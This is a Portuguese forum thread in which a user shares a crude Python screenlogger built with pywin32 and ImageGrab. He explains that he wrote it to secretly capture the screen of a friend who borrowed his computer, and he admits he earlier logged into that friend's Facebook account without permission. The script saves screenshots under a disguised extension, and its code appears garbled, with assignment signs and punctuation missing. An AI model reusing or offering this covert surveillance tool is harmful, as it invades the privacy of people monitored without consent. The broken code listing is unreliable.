Resultados 1 a 2 de 2

Tópico: Screenlogger em Python

Lamer
    Data de Ingresso
    Dec 2008
    Post Thanks / Like

Screenlogger em Python

Um pouco de história inútil, porque eu gosto muito mais de relatar histórias do escrever códigos:

Um colega que eu suspeitava levemente estar (furando o meu olho) dando em cima de uma garota que eu investia fortemente e era apaixonado, costumava me pedir emprestado o computador para ele dar uma olhada no facebook dele quando vinha a minha casa(vício). Ele sabe que uma vez eu descobri a senha dele pra checar uns logs dele com essa garota aí mas infelizmente não achei nada mesmo (e pro meu azar um dia eu mal loguei na conta dele, o chat tava on, alguém viu na mesma hora e veio falar com ele, eu não respondi e fiquei off, e depois este alguém foi brigar com ele do pq ele não havia respondido, daí a casa caiu pra mim). Com isso ele começou a tomar medidas cautelosas, mudou a senha e ativou aquele negócio de dispositivo de segurança do facebook através de torpedo SMS. Nem esquentei a cabeça, não havia encontrado nada nos logs mesmo, o facebook havia se tornado inútil. Só que num outro dia que ele me pediu pra usar o pc, eu o vi de longe conversando com essa mesma garota aí(até aí quase normal, sem problemas). Mas ele ao perceber a minha presença, mesmo à distância, escreveu alguma coisa pra ela, esperou ela ler e apagou a conversa na hora. O mais curioso é que ela também não o respondeu de volta. Deve ter falado "O fulano tá aqui, vou apagar a conversa, depois a gente se fala".

Daí sintetizei um pensamento "Por mais que a pessoa seja técnicamente muito leiga, ela pode ser muito mais esperta ainda."
    E lembrei de uma citação de um filme "Your friends are close, but your enemy is closer."

Falei, preciso de Screenlogger pra já. Na internet até se acha alguns keylogger, mas screenlogger é bastante escasso, não achei nada, apenas o módulo windows pro python e um outro pra manipulação de imagens, e resolvi montar o meu próprio screenlogger, que eu tivesse com ele pronto mais rápido possível, porém extremamente primitivo e não-portável, mas que funcionasse atentendo minha necessidade imediata e não sobrecarregasse o CPU.

Acontece que, infelizmente, não tive a chance de utilizá-lo para o meu propósito. Depois daquele dia, ele nunca mais pediu pra usar meu pc, e hoje resolvi compartilhar o código para que alguém possa fazer o bom uso dele caso for realmente necessário.

Código PHP:
    # by paulxer

import win32api
    import win32con
    import ImageGrab
    import time

numero 
    0
    ext 
    ".a" 
    pasta "qualquer/"
    espera 0.5
    numero_prints 
    6000

for i in range(numero_prints):

win32api.keybd_event(win32con.VK_SNAPSHOT0)

time.sleep(espera)

im ImageGrab.grabclipboard()

time.sleep(espera)  

im.save(pasta+str(numero)+ext"JPEG")

time.sleep(espera

numero += 1
      time
    .sleep(espera
    Comentários do código:
    Você vai precisar de dois módulos: Pywin32 e ImageGrap
    Número de prints é autoexplicativo, mas você pode calcular o tempo que o script vai continuar rodando ao multiplicar o tempo de espera total pelo número de prints.

Eu poderia rodar o método sleep todo no final do código no laço for, mas acontece que experimentalmente vai dar erro. Não investiguei o motivo a fundo, mas é causado pela gambiarra em "pasta+str(numero)+ext", que é necessária para não ter um mesmo arquivo sendo overwritten toda hora por prints diferentes, para associar uma extensão qualquer e para a localização da pasta. Então separei o sleep em várias partes e consegui fazê-lo funcionar perfeitamente.

Como disse, é extremamente primitivo(é a ideia) e pode ser bastante incrementado e melhorado. Muito fácil de ser entendido e de ser utilizado.

Abraços

Lamer
    Data de Ingresso
    Feb 2012
    Post Thanks / Like
    Prestei mais atencao na historia do que no codigo kkkkkkkkkkkk...

Mas ta bom...

Permissões de Postagem